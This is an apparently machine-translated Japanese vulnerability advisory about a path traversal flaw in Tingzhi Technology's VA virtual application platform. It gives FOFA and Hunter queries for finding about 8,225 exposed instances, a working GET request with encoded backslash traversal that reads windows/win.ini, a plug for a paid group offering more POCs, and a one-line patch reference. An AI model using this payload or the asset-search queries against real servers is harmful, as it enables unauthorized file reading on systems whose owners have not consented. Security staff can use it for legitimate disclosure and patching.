0x01 読書メモ
Tianqing Attack and Defense Laboratory の技術記事は参考用であり、この記事で提供される情報は、ネットワーク セキュリティ担当者が責任を負う Web サイト、サーバーなど (これらに限定されない) をテストまたは保守するためだけに提供されます。記事内の技術情報は、あらゆるコンピュータ システムへの侵入に使用されますので、無断で使用しないでください。本記事で提供する情報を利用したことによって生じた直接的または間接的な結果および損失は利用者ご自身が負担するものとします。この記事で提供されているツールは学習のみを目的としており、それ以外の使用は禁止されています。!!
0x02 脆弱性の説明
(1) VA仮想アプリケーションプラットフォーム
Tingzhi Technology の VA 仮想アプリケーション プラットフォームは、ユーザーに仮想アシスタント (Virtual Assistant) の機能とサービスを提供するように設計された革新的なテクノロジー プラットフォームです。仮想アシスタントは、自然言語処理、機械学習、その他の関連テクノロジーを通じて、ユーザーと対話し、さまざまなタスクやサービスを実行できる人工知能システムです。
FOFA 構文:
body="EAA益和应用接入系统"
ハンター構文:
web.body="EAA益和应用接入系统"
Hunter には合計8,225の資産があります
(2) 脆弱性 poc
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host:
Knowledge Planet でさらなる脆弱性 POC がリリース
地球に関する最近のテーマと、地球内のツールのデモンストレーション
Web セキュリティの脆弱性に関する最新の 1 日の共有脆弱性マイニング スキルの共有
0x03 修復計画
公式修正による緩和策
パッチリンク
http://www.tzfse.com.cn/